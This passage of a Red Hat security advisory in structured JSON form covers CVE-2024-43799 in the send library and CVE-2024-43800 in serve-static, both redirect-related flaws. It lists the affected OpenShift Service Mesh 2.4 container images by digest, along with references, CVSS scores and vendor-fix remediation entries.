}, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", 